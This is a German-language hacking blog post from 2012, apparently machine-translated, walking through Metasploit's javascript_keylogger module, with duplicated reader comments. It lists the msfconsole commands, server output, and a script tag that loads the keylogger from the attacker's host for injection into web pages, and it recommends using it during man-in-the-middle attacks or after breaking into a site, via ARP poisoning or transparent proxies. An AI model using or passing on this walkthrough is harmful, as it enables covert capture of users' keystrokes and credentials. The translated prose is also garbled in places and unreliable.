ClsHack:Computer Security Blog    

[Metasploit] Wie benutzt man javascript_keylogger Modul :D

Gesendet am: 5 Februar 2012

Es’ nur hinzugefügt Metasploit die Form:
javascript_keylogger

Dieses Modul ist sehr nützlich während einer MITM oder nach der Einreise eine Website.

Mal sehen, wie Sie mit :D

Ok jetzt können wir gehen :D
Wir aktualisieren Metasploit:
sudo msfupdate

Wir beginnen Metasploit:
sudo msfconsole

Lassen Sie das Formular:
search javascript keylogger

Verwenden:
auxiliary/server/capture/javascript_keylogger

Nun wollen wir sehen die Optionen:
show options

Sobald wir starten den Server konfiguriert :)
Zuerst denken Sie daran, jeder Apache-/ Web-Server auf Port zu stoppen 80:
sudo service apache2 stop

Ausführen und geben Sie:
[*] Starting keylogger. Please press [CTRl]+[C] if you wish to terminate.
[*] Using URL: http://192.168.1.190:80/
[*] Server started.
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /metasploit
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js
[*] 192.168.1.190 - [05/Feb/2012:09:41:06 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js

Nun haben wir jetzt viele Möglichkeiten, um JavaScript-Code in den Web-Seiten, die erzeugt injizieren:
<script type="text/javascript" src="http://192.168.1.190:80/jstOfpzuCWLJsM.js"></script>

Ich schlage vor, die folgende :D
[RUBY]Transparenter Proxy && Inject HTML / JavaScript

Oder wir verwenden können Paros Proxy oder ZEP :)

ARP Poisoning mit scapy und Web-Anfrage mit Paros Proxy auf Backbox gefälscht

Related posts:

  1. [Metasploit] Wie fügt man UNSTABLE Modul :)
  2. CVE-2010-3765: Mozilla Firefox Remotecodeausführung Excution Metasploit-Modul für
  3. XSS: MEHR LEISTUNG mit Rindfleisch und Metasploit
  4. [How-To]Metasploit && XSSF – Cross-Site Scripting Framework v.2.1
  5. [CVE-2010-2568]Metasploit:Fenster Oday Remotecodeausführung Exuction

Dieser Eintrag wurde am Sonntag, 5. Februar, 2012 bei 9:56 Uhr und ist abgelegt unter GNU / Linux, Hacking, Software. Sie können alle Antworten zu diesem Eintrag durch den RSS RSS 2.0 füttern. Sie können eine Antwort hinterlassen, oder trackback von deiner eigenen Seite.

Tagged with:
  • Shadowy Viper

    sehr interessant… m ho ein Problem.
    Was ich mache ist ettercap für eine MITM verwenden, aber dann weiß ich nicht, wie man einen transparenten Proxy wie die von Ihnen empfohlen verwenden.

  • ShadowyViper

    sehr interessant… m ho ein Problem.
    Was ich mache ist ettercap für eine MITM verwenden, aber dann weiß ich nicht, wie man einen transparenten Proxy wie die von Ihnen empfohlen verwenden.

  • Anonym

    Schauen Sie sich die Links, die ich in dem Artikel geschrieben und ähnlichen Erzeugnissen :D

  • ClsHackBlog

    Schauen Sie sich die Links, die ich in dem Artikel geschrieben und ähnlichen Erzeugnissen :D

  • http://twitter.com/SocketReve Lukas Reverberi

    Interessant…Ich tat das Gleiche mit scapy und nginx Proxy-Modus und der Herrschaft sub_filter für JavaScript Injektion, aber ich finde es so viel besser ist! :D (<3 Metasploit <3)

  • http://twitter.com/SocketReve Lukas Reverberi

    Interessant…Ich tat das Gleiche mit scapy und nginx Proxy-Modus und der Herrschaft sub_filter für JavaScript Injektion, aber ich finde es so viel besser ist! :D (<3 Metasploit <3)